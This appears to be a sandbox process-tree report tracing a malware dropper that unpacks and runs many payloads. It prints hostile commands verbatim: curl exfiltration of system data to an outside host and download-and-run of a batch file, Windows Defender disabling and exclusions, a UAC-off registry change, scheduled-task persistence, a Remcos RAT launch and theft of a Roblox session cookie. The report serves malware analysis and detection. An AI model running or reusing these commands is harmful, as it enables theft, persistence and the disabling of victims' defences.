C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2072

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2312

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2448

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2640

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2784

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2796

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2808

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2852

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2860

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:744

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3424

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3520
- C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
  "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2480
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:536
- - C:\Users\Admin\AppData\Local\Temp\a\random.exe
    "C:\Users\Admin\AppData\Local\Temp\a\random.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2648
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4072
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4444
    - - C:\Windows\system32\mode.com
        
        mode 65,10
        5⤵
        
        PID:4808
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e file.zip -p24291711423417250691697322505 -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:5008
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_7.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:4868
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_6.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:992
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_5.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:3044
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_4.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:3908
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_3.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2544
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_2.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:5068
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_1.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:4712
    - - C:\Windows\system32\attrib.exe
        
        attrib +H "in.exe"
        5⤵
        Views/modifies file attributes
        
        PID:892
    - - C:\Users\Admin\AppData\Local\Temp\main\in.exe
        
        "in.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:872
      - C:\Windows\SYSTEM32\attrib.exe
        
        attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
        6⤵
        Views/modifies file attributes
        
        PID:2664
      - C:\Windows\SYSTEM32\attrib.exe
        
        attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
        6⤵
        Views/modifies file attributes
        
        PID:3180
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4616
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell ping 127.0.0.1; del in.exe
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1104
        
        C:\Windows\system32\PING.EXE
        
        "C:\Windows\system32\PING.EXE" 127.0.0.1
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4368
- - C:\Users\Admin\AppData\Local\Temp\a\client.exe
    "C:\Users\Admin\AppData\Local\Temp\a\client.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4560
- - C:\Users\Admin\AppData\Local\Temp\a\l4.exe
    "C:\Users\Admin\AppData\Local\Temp\a\l4.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1664
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2696
  - - C:\Users\Admin\AppData\Local\Temp\onefile_1664_133785010349282403\l4.exe
      C:\Users\Admin\AppData\Local\Temp\a\l4.exe
      4⤵
      Drops startup file
      Executes dropped EXE
      Loads dropped DLL
      PID:1356
- - C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe
    "C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4820
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6436
  - - C:\Windows\SysWOW64\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2356
- - C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
    "C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3044
  - - C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
      "C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1800
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1296
        5⤵
        Program crash
        
        PID:5860
- - C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe
    "C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:3976
  - - C:\Program Files\Windows Media Player\graph\graph.exe
      "C:\Program Files\Windows Media Player\graph\graph.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:5108
- - C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:960
- - C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
    "C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4732
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
      4⤵
      PID:2780
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2420
    - - C:\Windows\system32\mode.com
        
        mode 65,10
        5⤵
        
        PID:5544
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e file.zip -p24291711423417250691697322505 -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:5152
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_7.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:5644
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_6.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2356
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_5.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:3188
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_4.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1620
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_3.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2824
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_2.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:3772
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_1.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3156
    - - C:\Windows\system32\attrib.exe
        
        attrib +H "in.exe"
        5⤵
        Views/modifies file attributes
        
        PID:3888
    - - C:\Users\Admin\AppData\Local\Temp\main\in.exe
        
        "in.exe"
        5⤵
        Executes dropped EXE
        
        PID:1532
      - C:\Windows\SYSTEM32\attrib.exe
        
        attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
        6⤵
        Views/modifies file attributes
        
        PID:3988
      - C:\Windows\SYSTEM32\attrib.exe
        
        attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
        6⤵
        Views/modifies file attributes
        
        PID:5680
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4656
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell ping 127.0.0.1; del in.exe
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3972
        
        C:\Windows\system32\PING.EXE
        
        "C:\Windows\system32\PING.EXE" 127.0.0.1
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5696
- - C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
    "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:4656
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\7YCBIE37YCBA" & exit
      4⤵
      System Location Discovery: System Language Discovery
      PID:552
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:5172
- - C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2216
- - C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe
    "C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:5496
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
      4⤵
      System Location Discovery: System Language Discovery
      PID:3784
    - - C:\Windows\SysWOW64\systeminfo.exe
        
        systeminfo
        5⤵
        System Location Discovery: System Language Discovery
        Gathers system information
        
        PID:4500
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:6040
  - - C:\Windows\SysWOW64\curl.exe
      curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5812
  - - C:\Windows\SysWOW64\curl.exe
      curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4904
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c type "C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
      4⤵
      Drops startup file
      System Location Discovery: System Language Discovery
      PID:1772
  - - C:\Windows\SysWOW64\curl.exe
      curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1416
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
      4⤵
      System Location Discovery: System Language Discovery
      PID:5332
  - - C:\Windows\SysWOW64\curl.exe
      curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5244
- - C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe
    "C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:5372
- - C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:6072
  - - C:\Users\Admin\AppData\Local\Temp\bbvlnu.exe
      "C:\Users\Admin\AppData\Local\Temp\bbvlnu.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:6008
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5420
    - - C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6008" "2444" "2336" "2448" "0" "0" "2452" "0" "0" "0" "0" "0"
        5⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:696
  - - C:\Users\Admin\AppData\Local\Temp\aysnfp.exe
      "C:\Users\Admin\AppData\Local\Temp\aysnfp.exe"
      4⤵
      Executes dropped EXE
      PID:5272
- - C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe
    "C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Loads dropped DLL
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1896
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp7990.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp7990.tmp.bat
      4⤵
      System Location Discovery: System Language Discovery
      PID:2428
- - C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe
    "C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    PID:4564
  - - C:\Program Files\Windows Media Player\graph\graph.exe
      "C:\Program Files\Windows Media Player\graph\graph.exe"
      4⤵
      Executes dropped EXE
      PID:2984
- - C:\Users\Admin\AppData\Local\Temp\a\RMX.exe
    "C:\Users\Admin\AppData\Local\Temp\a\RMX.exe"
    3⤵
    - Adds policy Run key to start application
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    PID:728
  - - C:\Windows\SysWOW64\cmd.exe
      /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:6084
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5992
    - - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:2196
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      PID:2384
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4016
      - C:\ProgramData\Remcos\remcos.exe
        
        C:\ProgramData\Remcos\remcos.exe
        6⤵
        Adds policy Run key to start application
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        
        PID:5104
        
        C:\Windows\SysWOW64\cmd.exe
        
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5228
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:5336
        
        C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        8⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:2892
        
        \??\c:\program files (x86)\internet explorer\iexplore.exe
        
        "c:\program files (x86)\internet explorer\iexplore.exe"
        7⤵
        
        PID:4260
- - C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe
    "C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:4668
  - - C:\Windows\System32\certutil.exe
      "C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\Admin\AppData\Local\Temp\tmp8104.tmp"
      4⤵
      PID:5292
- - C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
    "C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:5640
  - - C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
      "C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3508
- - C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Program Files directory
    PID:2824
  - - C:\Program Files\Windows Media Player\graph\graph.exe
      "C:\Program Files\Windows Media Player\graph\graph.exe"
      4⤵
      Executes dropped EXE
      PID:5768
- - C:\Users\Admin\AppData\Local\Temp\a\888.exe
    "C:\Users\Admin\AppData\Local\Temp\a\888.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2152
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3180
- - C:\Users\Admin\AppData\Local\Temp\a\50to.exe
    "C:\Users\Admin\AppData\Local\Temp\a\50to.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4372
- - C:\Users\Admin\AppData\Local\Temp\a\info.exe
    "C:\Users\Admin\AppData\Local\Temp\a\info.exe"
    3⤵
    PID:5624
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f
      4⤵
      PID:2900
    - - C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f
        5⤵
        
        PID:412
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C regedit /s "%SystemDrive%\Windows\SysWOW64\ruts\11.reg
      4⤵
      PID:4108
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "C:\Windows\SysWOW64\ruts\11.reg
        5⤵
        Runs .reg file with regedit
        
        PID:4044
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "%SystemDrive%\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart
      4⤵
      PID:4964
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "C:\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3200
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"
      4⤵
      PID:2648
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"
        5⤵
        
        PID:7808
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c delete.bat
      4⤵
      PID:1896
- - C:\Users\Admin\AppData\Local\Temp\a\50.exe
    "C:\Users\Admin\AppData\Local\Temp\a\50.exe"
    3⤵
    PID:1104
- - C:\Users\Admin\AppData\Local\Temp\a\SH.exe
    "C:\Users\Admin\AppData\Local\Temp\a\SH.exe"
    3⤵
    PID:5892
- - C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe"
    3⤵
    PID:4724
- - C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"
    3⤵
    PID:1732
  - - C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"
      4⤵
      Views/modifies file attributes
      PID:4976
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3420
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6308
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4296
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      PID:6432
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      PID:8108
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      PID:6160
